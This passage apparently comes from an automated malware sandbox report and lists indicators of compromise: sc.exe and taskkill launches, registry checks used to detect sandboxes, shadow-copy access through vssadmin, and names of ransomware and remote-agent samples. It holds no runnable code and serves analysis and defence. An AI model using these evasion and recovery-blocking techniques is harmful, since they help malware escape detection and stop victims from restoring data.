opened for modification C:\Windows\WinningNative InfluencedNervous.exe File opened for modification C:\Windows\SystemTemp chrome.exe File created C:\Windows\sysvplervcs.exe s.exe -
Launches sc.exe 15 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 6028 sc.exe 632 sc.exe 3604 sc.exe 5332 sc.exe 5404 sc.exe 6052 sc.exe 6120 sc.exe 5640 sc.exe 2160 sc.exe 2960 sc.exe 632 sc.exe 5240 sc.exe 5260 sc.exe 5280 sc.exe 5224 sc.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 6620 mshta.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Detects Pyinstaller 2 IoCs
resource yara_rule behavioral1/files/0x0029000000045358-12645.dat pyinstaller behavioral1/files/0x00260000000454b9-13718.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
pid pid_target Process procid_target 4956 4532 WerFault.exe 255 8608 7900 WerFault.exe 411 9836 5920 WerFault.exe 417 3032 3768 WerFault.exe 419 4428 5012 WerFault.exe 124 9052 11476 WerFault.exe 335 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language softina.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Organizational.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 132069246.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SingerJudy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language def.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language splwow64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language meshagent32-group.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language av_downloader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InfluencedNervous.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language npp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language inst77player.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2750020248.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wow.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysklnorbcv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tdrpload.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tpeinf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CoronaVirus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Hive%20Ransomware.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Predicted.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysmablsvr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language s.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3084722593.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_regiis.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4434.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language buildred.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language o.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2963921430.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1713315379.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x00290000000451ff-370.dat nsis_installer_1 behavioral1/files/0x00290000000451ff-370.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 16 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters dwm.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Predicted.pif Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Organizational.pif Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Organizational.pif Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Predicted.pif -
Delays execution with timeout.exe 4 IoCs
pid Process 3364 timeout.exe 1524 timeout.exe 8728 timeout.exe 3000 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 9220 WMIC.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 7832 vssadmin.exe -
Kills process with taskkill 36 IoCs
pid Process 10764 taskkill.exe 2564 taskkill.exe 6940 taskkill.exe 9888 taskkill.exe 6256 taskkill.exe 7852 taskkill.exe 6276 taskkill.exe 10644 taskkill.exe 1156 taskkill.exe 2208 taskkill.exe 3160 taskkill.exe 3088 taskkill.exe 9556 taskkill.exe 11092 taskkill.exe 9172 taskkill.exe 8440 taskkill.exe 11096 taskkill.exe 10056 taskkill.exe 8136 taskkill.exe 2476 taskkill.exe 9464 taskkill.exe 5728 taskkill.exe 7068 taskkill.exe 9248 taskkill.exe 11156 taskkill.exe 11204 taskkill.exe 9632 taskkill.exe 10316 taskkill.exe 7756 taskkill.exe 1492 taskkill.exe 10324 taskkill.exe 1420 taskkill.exe 7432 taskkill.exe 5432 taskkill.exe 10292 taskkill.exe 10168 taskkill.exe -
Modifies data under HKEY_USERS 39 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E dwm.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133760995768133329" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0 = 78003100000000005759778a1100557365727300640009000400efbe874f77486e5998b92e000000fd0100000000010000000000000000003a0000000000cd51c90055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1226833921" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\SniffedFolderType = "Generic" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0 = 56003100000000005759778a12004170704461746100400009000400efbe5759778a6e5998b92e00000006090400000002000000000000000000000000000000daa1b8004100700070004400610074006100000016000000 chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0\0 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0\MRUListEx = ffffffff chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0\0 = 50003100000000006e59c0b910004c6f63616c003c0009000400efbe5759778a6e59c0b92e0000001909040000000200000000000000000000000000000080f90a004c006f00630061006c00000014000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0\0\0\NodeSlot = "11" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "3" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\SniffedFolderType = "Generic" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell chrome.exe Key created 